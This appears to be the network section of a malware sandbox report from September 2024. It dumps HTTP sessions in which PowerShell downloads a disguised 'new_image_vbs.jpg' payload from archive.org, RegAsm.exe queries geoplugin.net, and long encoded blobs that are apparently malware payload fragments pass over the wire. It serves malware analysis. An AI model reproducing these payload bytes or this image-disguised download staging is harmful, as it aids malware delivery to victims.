                          Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                          Sep 6, 2024 11:26:04.968229055 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                          Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                          Sep 6, 2024 11:26:04.968239069 CEST448INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                          Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                          Sep 6, 2024 11:26:04.968249083 CEST1236INData Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                          Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                          Sep 6, 2024 11:26:04.968261003 CEST1236INData Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                          Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                          Sep 6, 2024 11:26:04.968271971 CEST1236INData Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                          Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                          Sep 6, 2024 11:26:04.968283892 CEST1236INData Raw: 77 61 50 4f 32 44 68 39 45 58 50 6d 74 44 56 36 55 63 4f 49 5a 54 2f 32 6f 73 4e 54 59 44 41 31 45 65 4e 53 58 54 71 31 55 5a 4e 74 55 6a 4a 31 38 52 4e 59 45 44 31 41 41 41 41 55 42 51 42 51 42 67 50 50 37 44 79 2b 45 70 50 4a 32 44 6c 36 6f 6d
                          Data Ascii: waPO2Dh9EXPmtDV6UcOIZT/2osNTYDA1EeNSXTq1UZNtUjJ18RNYED1AAAAUBQBQBgPP7Dy+EpPJ2Dl6omOjpDL6QiMRFT5woFAAAAIAUAQAAAA/49PH/DN+ErPM0Tk90SPNwju8sjOamTu5caOVmjH4wOOcjT024uNdXj2yEoM5JzYy0kMyAD+AAAAABQBwAAAA8Dn/AgPB7jA7UYORhzb4AFOIcT+345NKdDQ2YvNubTm1EfN
                          Sep 6, 2024 11:26:04.968295097 CEST1236INData Raw: 75 6a 56 36 45 76 4f 58 71 44 6a 36 38 6e 4f 63 70 6a 50 35 45 59 4f 34 67 7a 35 34 6f 4d 4f 32 69 54 4a 32 45 74 4e 43 5a 7a 49 32 51 51 4e 5a 54 7a 62 7a 49 30 4d 59 4d 6a 44 79 34 6b 4d 6b 49 44 42 78 45 64 4d 34 42 44 37 77 51 4f 41 41 41 41
                          Data Ascii: ujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7wQOAAAAaAQAwAAAA/MzPr4zi+kmPO5DR+cQPt2zl8kPPGzzg8UDPrsDv7whOArTQ68hOCkzz5MbOCmDV4sMOvijh401NffTw3g5NvdDA2IuNDbTu2MqNEaTT1YdNGXzu1QZNbVDP0ALNASTY0UENFMz7zk2MYNzQzAhMuKzp
                          Sep 6, 2024 11:26:04.968305111 CEST1236INData Raw: 41 67 50 67 33 44 34 39 6b 42 50 2f 7a 44 37 38 49 4e 50 2f 79 54 70 37 63 37 4f 78 75 7a 48 36 6f 52 4f 69 6c 7a 57 35 41 55 4f 36 6b 7a 4d 35 55 53 4f 61 6b 7a 45 34 59 4f 4f 4e 6a 7a 4b 32 51 71 4e 68 59 44 42 31 77 66 4e 7a 58 7a 78 31 55 45
                          Data Ascii: AgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAFA/M+Pk+TI+ImPI1z29AdP+2Du7cZO5nDU50wNtfTY3AkN1bT62UtNPbTx2orN2YjL2YiNXYTD2IQNOXjl08INURjFzo/MmPjmzY3M5Iz8yktMyKjfycjMuITHxgfMgHD2xwcM
                          Sep 6, 2024 11:26:04.968317032 CEST1236INData Raw: 6b 6a 73 35 67 61 4f 65 6c 44 56 35 45 53 4f 55 67 6a 5a 34 34 46 4f 56 68 44 47 34 38 77 4e 31 66 54 66 33 45 33 4e 4d 59 44 61 31 45 56 4e 46 56 44 46 31 34 51 4e 48 51 54 2b 30 6b 4e 4e 39 53 54 73 30 41 4b 4e 46 53 7a 64 30 30 47 4e 6a 52 7a
                          Data Ascii: kjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwPE/TN+wdP5wz44wqNwbD62IuNKbTK00FNMNTSy4tMZLTwycnMXJzBxYbM1FjSwEPMfDz1w8FAAAAQAMAkA8Dq/w5PK+TZ/s1PL9jR/4zPO8TC/QgP47T0
                          Sep 6, 2024 11:26:04.973093033 CEST1236INData Raw: 45 62 4d 71 47 7a 6f 78 30 5a 4d 58 47 54 6b 78 73 59 4d 46 47 6a 55 78 6b 55 4d 35 45 54 4b 78 6b 52 4d 50 45 54 42 77 38 50 4d 36 44 54 38 77 55 4f 4d 64 44 54 31 77 30 4d 4d 47 44 7a 76 77 67 4c 4d 78 43 6a 71 77 4d 4b 4d 63 43 6a 6c 77 41 4a
                          Data Ascii: EbMqGzox0ZMXGTkxsYMFGjUxkUM5ETKxkRMPETBw8PM6DT8wUOMdDT1w0MMGDzvwgLMxCjqwMKMcCjlwAJMKCDhw4HMeBzVwwEMDBTLwgAMDAAABgGADAFA/09PY/D0/o8PB/zm/Q3Pu9TX/U1Pm8TG/AxPB4T9+otPO6Tc+4lPP5jR+sjPu4TJ98ePo3T29IZPK2Tg88OPkzTy8sLPoyDl84IP2xTY8sFPDxzL8cyOfvT27E8O


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.2249166178.237.33.50804008C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          TimestampBytes transferredDirectionData
                          Sep 6, 2024 11:26:09.341891050 CEST71OUTGET /json.gp HTTP/1.1
                          Host: geoplugin.net
                          Cache-Control: no-cache
                          Sep 6, 2024 11:26:09.960402012 CEST1170INHTTP/1.1 200 OK
                          date: Fri, 06 Sep 2024 09:26:09 GMT
                          server: Apache
                          content-length: 962
                          content-type: application/json; charset=utf-8
                          cache-control: public, max-age=300
                          access-control-allow-origin: *
                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.2249162207.241.224.24433900C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          2024-09-06 09:26:02 UTC101OUTGET /download/new_image_vbs/new_image_vbs.jpg HTTP/1.1
                          Host: archive.org
                          Connection: Keep-Alive
                          2024-09-06 09:26:02 UTC780INHTTP/1.1 200 OK
                          Server: nginx/1.24.0 (Ubuntu)
                          Date: Fri, 06 Sep 2024 09:26:02 GMT
                          Content-Type: image/jpeg; charset=UTF-8
                          Content-Length: 1933957
                          Connection: close
                          Last-Modified: Thu, 05 Sep 2024 13:20:17 GMT
                          ETag: "66d9b011-1d8285"
                          Strict-Transport-Security: max-age=15724800
                          Expires: Fri, 06 Sep 2024 15:26:02 GMT
                          Cache-Control: max-age=21600
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                          Access-Control-Allow-Credentials: true
                          Accept-Ranges: bytes
                          Onion-Location: https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_image_vbs.jpg
                          Referrer-Policy: no-referrer-when-downgrade
                          2024-09-06 09:26:02 UTC3505INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                          2024-09-06 09:26:02 UTC4096INData Raw: 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc a3 23 6e 08 78 21 78 39 89 e2 de 13 2c 7a 22 ba 15 da df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33
                          Data Ascii: q^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8`mFfYk0?g3
                          2024-09-06 09:26:02 UTC4096INData Raw: da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 a5 f5 20 ab 28 b1 cd 8c 26 93 59 aa 48 58 51 64 1d 09 ed 80 41 1b f9 c1 9d b9 1d 32 3c 41 e6 58 e3 25 bd 21 ac 64 45 ae 98 4a ce 11 59 aa 8f 17 82 d5 c9 3c e9 b9 d0 85 ed 4b 81 ea fe c4 4a 74 3f 68 fc 33 c5 26 dd 2a a8 72 ca 0f 3c
                          Data Ascii: :GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV (&YHXQdA2<AX%!dEJY<KJt?h3&*r<
                          2024-09-06 09:26:02 UTC4096INData Raw: f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78 44 b3 e9 3c ed e8 97 f8 43 74 3f 1b c6 f4 cf 3f 85 ce ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8
                          Data Ascii: p#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kxD<Ct??wH?I?U/;I>A$Gsl76
                          2024-09-06 09:26:02 UTC4096INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                          Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                          2024-09-06 09:26:02 UTC4096INData Raw: 8e 37 a9 78 d6 31 42 bd 8e 27 24 84 8e e4 11 ce 06 64 fe 16 cf 20 71 23 2b f5 e4 70 72 d0 23 6e 0b 29 da c9 d8 f7 e7 36 35 05 06 96 30 2d 9f 6f 7c f3 b3 49 ac 69 e8 46 6d 4f 5a e3 03 5c de c0 28 55 d8 c2 c0 ea 14 b1 03 8e f9 95 e7 eb 28 12 80 83 c1 ae d8 70 a5 9c 12 e7 cb ff 00 08 c0 76 69 94 b2 81 1d 8e a5 b1 76 94 3d d2 01 d8 0c 93 22 35 20 24 57 63 8b a8 74 9a 47 93 98 c7 e1 38 0d 25 b1 16 28 f7 c7 02 a1 1e ae 49 e0 2e 79 dd 68 9d 26 67 8e 52 a9 b4 1c 3c de 2d 24 11 42 9b 55 d8 ad 93 7d fb 60 68 6a 35 09 a2 8c bc b4 49 e1 57 b9 39 95 1e 9f 53 e3 52 36 a6 56 d9 12 fb 0e 00 1e d8 dc 05 fc d8 35 da a7 a6 b0 54 15 04 06 06 ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07
                          Data Ascii: 7x1B'$d q#+pr#n)650-o|IiFmOZ\(U(pviv="5 $WctG8%(I.yh&gR<-$BU}`hj5IW9SR6V5T=./ER;UM'IlWLPOj=
                          2024-09-06 09:26:02 UTC4096INData Raw: 6d 06 84 96 aa 07 fe cf 17 3f 0f e9 81 ee 7f 6d 92 03 e2 3e 13 48 37 46 b2 c4 ca 1a e9 82 c4 d5 55 c7 e3 cf 9d 78 71 75 82 4b ae 19 4e e3 f5 cf a1 fe dc 07 97 af f0 e6 2b 0a 80 d3 28 21 58 33 52 42 6d 89 3e ae bc 56 7c ee 16 77 d1 84 88 a8 25 88 62 05 f4 ac 07 24 95 8a 82 0a 93 44 93 f2 17 99 ae c5 a7 83 73 ee 0f 6d ea 51 ec 7b d6 37 31 8a 04 1c 17 72 3d 54 b5 78 a1 9a 17 ab 55 01 4d 00 d5 e9 c0 67 4c a4 80 19 c3 2b 03 b4 00 0f 4c 0b bb 03 b0 0d d7 d4 dd 57 4e df 5c 91 3a 2b 54 7e 56 ea e6 98 5e 40 71 6d 6e aa 77 15 e7 e1 5f 1c 04 67 8d d6 78 da 31 5b ce c3 f5 e3 fa e2 c5 a4 55 82 40 2c a9 3c 7c 8e ef eb 9a 13 a2 a9 84 33 b0 f5 dd 58 e7 e5 89 c0 b6 e8 09 dc 56 65 e1 9a c7 37 7f cb 01 e1 3e 9f 5c 81 35 2d b2 42 6c 2d e0 75 1e 16 ac bb f4 ec f6 38 2a e0 f3
                          Data Ascii: m?m>H7FUxquKN+(!X3RBm>V|w%b$DsmQ{71r=TxUMgL+LWN\:+T~V^@qmnw_gx1[U@,<|3XVe7>\5-Bl-u8*
                          2024-09-06 09:26:02 UTC4096INData Raw: 12 6b 35 0b 24 7a 96 04 01 0b 46 fb 54 0a ef ce 07 22 c2 ec 8f 1e a6 66 49 4b 6d da d2 1b 03 bd ee 3d f2 ba dd 46 9f 45 2a 24 8d 3b 16 6d a4 2c ec 08 e9 47 96 c6 f4 1a 35 8f c3 74 a9 23 15 92 15 20 8b ee 6f ae 2b e2 b0 3b 6b 21 64 d3 b3 45 b4 6e 74 bb dd f1 a6 18 16 9f 4b 33 b4 52 69 27 7f 22 a9 95 a5 7f 51 bf 7b c5 3c 4f ca 4d 14 e8 7c e4 95 82 b0 0f 33 10 cd ba 8f 04 d7 f0 f5 cd 5f 0f 69 61 f0 ff 00 2b 50 18 36 e6 da 5b 92 07 6e b9 9d f6 8d 75 0b e1 f1 ca a4 b4 4a 69 c0 21 54 73 c1 fc e8 60 64 c5 e1 32 be 82 1d 5c 6b b8 04 6d e1 9f f0 80 cd ce 2d f7 57 d4 48 91 88 c9 91 c6 e5 e8 01 1e f6 73 6f c1 e4 96 7f 02 68 c3 ed 72 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76
                          Data Ascii: k5$zFT"fIKm=FE*$;m,G5t# o+;k!dEntK3Ri'"Q{<OM|3_ia+P6[nuJi!Ts`d2\km-WHsohrpEaU/piu4d?!WfytUv
                          2024-09-06 09:26:02 UTC4096INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 